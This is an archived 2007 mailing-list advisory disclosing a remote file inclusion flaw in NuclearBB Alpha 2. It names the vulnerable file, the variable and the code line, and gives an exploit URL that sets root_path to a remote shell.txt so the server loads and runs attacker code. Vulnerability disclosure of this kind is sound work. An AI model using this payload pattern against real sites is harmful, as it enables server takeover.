Pantek Library

Hosting Provided By

CybrHost

High Speed Hosting

NuclearBB Alpha 2 Remote File Inclusion

From: <b14ck1c3(at)hotmail.com>
Date: Tue Sep 11 2007 - 03:12:00 EDT

Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/
Vulnerability Type: Remote File Inclusion Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt? Method: get
Register_globals: On
Vulnerable variable: root_path
Line number: 14
Lines:

require("$root_path/inc/functions_email.php"); $mail = new email;

Received on Tue Sep 11 11:53:07 2007

This message: [ Message body ]
Next message: VR-Subscription-noreply(at)assurent.com: "Assurent VR - Microsoft Agent Crafted URL Stack Buffer Overflow"
Previous message: laurent.gaffie(at)gmail.com: "PHP 5.2.4 <= various mysql functions safemode & open_basedir bypass"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:15:12 EDT

Contact Us Legal Notices Order Services Online
Pantek Home Privacy Policy IT news Site Map Pantek Library